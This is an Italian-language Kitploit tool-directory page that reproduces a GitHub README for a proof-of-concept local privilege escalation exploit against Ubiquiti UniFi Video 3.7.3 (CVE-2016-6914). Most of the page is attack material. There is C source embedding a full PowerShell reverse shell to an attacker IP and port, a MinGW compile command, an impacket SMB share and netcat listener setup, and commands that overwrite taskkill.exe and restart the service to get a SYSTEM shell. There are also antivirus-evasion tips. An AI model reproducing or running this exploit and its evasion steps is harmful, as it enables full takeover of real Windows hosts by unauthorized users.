Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2016-6914-UniFiVideo-LPE — CVE-2016-6914-UniFiVideo-LPE | Kitploit
Strumenti/GitHubGitHub/cybermonkx/cve-2016-6914-unifivideo-lpe
Escalation di PrivilegiExploitPenetration TestingApprendimento e FormazioneSviluppo PayloadBinary Exploitation
GitHubcybermonkx/cve-2016-6914-unifivideo-lpe

CVE-2016-6914-UniFiVideo-LPE

CVE-2016-6914-UniFiVideo-LPE

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1 anno faNon ancora revisionato

CVE-2016-6914 - PoC LPE per Ubiquiti UniFi Video 3.7.3

🔥 Panoramica

Questo repository contiene una proof-of-concept (PoC) per CVE-2016-6914, una vulnerabilità di escalation dei privilegi locale (LPE) che riguarda Ubiquiti UniFi Video 3.7.3.

Un attaccante con privilegi limitati può sostituire un binario attendibile (taskkill.exe) all'interno di C:\ProgramData\unifi-video\ per eseguire codice dannoso con privilegi SYSTEM.


⚡ Sfruttamento

Passaggi per lo sfruttamento

1️⃣ Sostituisci taskkill.exe con un payload dannoso (exploit.exe).
2️⃣ Attendi che UniFi Video Service venga eseguito o riavvialo manualmente.
3️⃣ Il payload dannoso viene eseguito, fornendo una shell SYSTEM.


🚀 Payload inclusi

  • ✅ Reverse Shell PowerShell
  • ✅ Reverse Shell Netcat
  • ✅ Tecniche di bypass AV

📜 Codice PoC (Reverse Shell PowerShell)

Questo payload sostituisce taskkill.exe e avvia una reverse shell.

root@kitploit:~
#include <windows.h>

int main() {
    system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
    return 0;
}
✅ Compila usando MinGW:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe

---

🛠️ Istruzioni di utilizzo
1️⃣ Configura la condivisione SMB (per la consegna remota del file)
Su Kali, esegui:
impacket-smbserver share . -smb2support
2️⃣ Avvia il listener Netcat
nc -lvnp 4444
3️⃣ Consegna il payload alla macchina target
Esegui i seguenti comandi PowerShell sul sistema target:
copy \\10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe
stop-service UnifiVideoService -Force
start-service UnifiVideoService
4️⃣ Ottieni la shell SYSTEM
Una volta eseguito, una shell SYSTEM si apre sul tuo listener!

🛡️ Bypass dell'Antivirus (AV)
Per eludere il rilevamento AV di base, prova: ✔️ Impacchetta l'eseguibile (UPX):
upx --best --lzma exploit.exe
✔️ Usa syscall alternative invece di system().
✔️ Incorpora in processi legittimi usando DLL Injection.

⚠️ Disclaimer
📢 Questa PoC è solo a scopo educativo!
🛑 L'uso non autorizzato è illegale e punibile.
👨‍💻 Usala solo in modo legale ed etico.

Riferimento:https://www.exploit-db.com/exploits/43390
Scarica lo strumento